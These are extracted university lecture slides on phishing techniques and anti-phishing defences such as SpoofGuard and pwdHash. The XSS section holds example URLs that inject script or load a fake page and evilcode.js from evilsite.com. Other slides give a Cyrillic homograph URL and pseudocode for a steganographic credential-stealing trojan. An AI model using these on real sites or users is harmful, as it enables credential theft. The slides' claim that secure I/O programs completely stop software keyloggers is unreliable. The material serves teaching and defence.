Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

Phishing and Anti-phishing Techniques

VIEWS: 1,015 PAGES: 32

									22c: 169 Computer Security
Phishing and Anti-phishing techniques Dat Tien Nguyen Xin Xiao

Introduction


Definition: “Phishing is the practice of sending out fake emails, or spam, written to appear as if they have been sent by banks or other reputable organizations, with the intent of luring the recipient into revealing sensitive information such as usernames, passwords, account IDs, ATM PINs or credit card details.” (Know your enemy: Phishing, http://www.honeynet.org/papers/phishing/ ).

Introduction

(Source: APWG)

Introduction

(Source: APWG)

Phishing will always be an awesome danger

Phishing techniques
Phishing thought Compromised Web Servers  Phishing through PortRedirection  Phishing using Botnet  Phishing using Keyloggers


Phishing thought Compromised Web Servers
The attack happens as following:  attackers scan for vulnerable servers  server is compromised and a rookit or password protected backdoor installed  phishers gain access to the server through this encrypted back door  if the compromised server is a web server, pre-built phishing web sites are downloaded  some limited content confituration and web site testing is performed  mass emailing tools are downloaded and used to advertise the fake web site via spam email  web traffic begins to arrive at the phishing web site and potential victims access the malicious content  More specific attacks: www.honeynet.org

Phishing through PortRedirection




The port redirection service is designed to reroute HTTP requests sent to the honeypot web server to another remote web server in a transparent manner, potentially making the location of the content source harder to trace. The hacker downloaded and installed a tool called redir on the honeypot, which was a port redirector utility designed to transparently forward incoming TCP connections to a remote destination host.

Phishing using Botnet
Definition: “A botnet is a network of compromised computers that can be remotely controlled by an attacker.” (source: Know your enemy: Phishing, http://www.honeynet.org/papers/phishin g/)  Email and Spam  Cross-site Scripting Attacks  Distributed Phishing Attack


Email and Spam

Email and Spam

Email and Spam
 

Misspelled URLs


http://www.yourbank.com.example.com/
http://www.google.com@members.tripod.co m URL "http://www.pаypal.com/" (where the first a is replaced by a Cyrillic а)

Using @ symbol




Using unicode characters




Hiding/replacing address bar

Email and Spam

Email and Spam


Inserting random words or zero-size pictures to pass the spam filters

Cross-site Scripting Attacks




Cross-site scripting attacks (CSS or XSS) make use of custom URL or code injection into a valid web-based application URL or imbedded data field. In general, these CSS techniques are the result of poor web-application development processes. While there are numerous vectors for carrying out a CSS attack, Phishers must make use of URL formatted attacks. Typical formats for CSS injection into valid URL’s include: Full HTML substitution:


http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fa kepage.htm http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode... http://mybank.com/ebanking?page=1&response=evilsite.com%21e vilcode.js&go=2



Inline embedding of scripting content:




Forcing the page to load external scripting code:


Distributed Phishing Attack


Idea: using multi collection centers




Collection center is a website or server phisher use to collect victims’ information Purpose: hard to detect Phishers post a software that is free for downloading This software can be triggered by phisher



Method: using malwares
 



Components of malware: The distributed phishing makes use of distributed computation (faulttolerance), cryptovirology, and public key steganography. It includes the transmitter application, the transponder cryptotrojan, and the receiver application

Distributed Phishing Attack
Transmitter():  Input: none  Output: phishing e-mail that has a forged source e-mail address  NonvolatileStorage: L1 is a set of e-mail addresses of potential phishing victims  L2 = {(s1, s2) : s1 is the e-mail address of an impersonated organization and  s2 is the URL of the phishing page that impersonates s1}.  1. if L1 is the empty list then halt  2. select address a ЄR L1  3. set L1 = L1\{a}  4. select (s1, s2) = ti ЄR L2  5. construct the body of the phishing e-mail message θ that includes a hyperlink to s2  6. e-mail θ to a using forged source e-mail address s1 Transponderi(y):  Input: public encryption key y of the phisher  Output: stegotext message c  NonvolatileStorage: L3 is a set of data files that each support steganographic information transfer.  1. if L3 is the empty list then halt (i.e., site no longer services HTTP requests)  2. present a login prompt and a “sign in” button to users that establish a web connection  3. if the user enters a login and password pair and clicks on “sign in” then:  4. let α denote the login and password pair  5. present a forged page of content, or indicate an HTTP error, etc.  6. choose d ЄR L3  7. set L3 = L3\{d}  8. set m = α || i  9. c = StegoEnc(y, d,m)  10. post c anonymously to one or more bulletin boards B Receiver(x, c):  Input: private decryption key x of the phisher and stegotext c  Output: FAILURE or the login and password pair α along with i  1. (m, errcode) = StegoDec(x, c)  2. if errcode = FAILURE then halt with FAILURE  3. extract the login pair α and integer i from m = α || i  4. output (α, i) and halt Note that if α is a proper login and password pair to an account at organization i, then (α, i) gives the phisher access to this account.

Phishing using Keyloggers




Definition: “A keylogger is something that records keystrokes made on a computer. It captures every key pressed on the keyboard and stores it down in a file or memory bank that can be viewed by the person performing the monitoring in real-time, or at a later date.” (http://www.keyghost.com/keylogger/ ). There are two types of keylogger: hardware keylogger and software keylogger

Hardware Keylogger

Three types (www.wikipedia.org ):  Inline devices that are attached to the keyboard cable  Devices which can be installed inside standard keyboards  Actual replacement keyboards that contain the key logger already built-in It only can be discovered by people and removed physically

Software Keylogger

Software Keylogger
* Can capture both keys pressed and screen * 2 sub-categories (www.keygosh.com ):
Visible in the task manager  Invisible and stealth keloggers


* It is true that secure I/O programs can completely protect your computer from software keyloggers

Anti-phishing technologies


Introduction:

Anti-phishing techniques are used to prevent and detect phishing attacks.

Anti-phishing technique


Email-filtering
may be configured to identify specific known phishing messages  prevent them from reaching users  may also erroneously blocking legitimate email


Browser extension
SpoofGuard  pwdHash  BSCI  Phishing-browser-based defenses


SpoofGuard


stateless page evaluation
   

Url check Image check Link check Password check Domain check Referring page Image-domain association



stateful page evaluation
  



evaluation of post data

pwdHash
Hash(pwd, dom)=PRFpwd(dom) PRF is a Pseudo Random Function


BSCI
Browser’s secure connection indicators  Pad lock icon  Certificate dialog  Location bar  Menu bar All of these can be tampered by attackers!


Tamper-resistant BSCIs


Authenticating BSCI with individually chose bitmaps or messages

Evaluation of current antiphishing toolbar


Some popular anti-phishing toolbar:
Netcraft AntiPhishing Toolbar  Google Toolbar  Trustwatch Toolbar  SpoofGuard  Cloudmark’s AntiFraud Toolbar


Evaluation result

Thank you for your attention

Question?


								
To top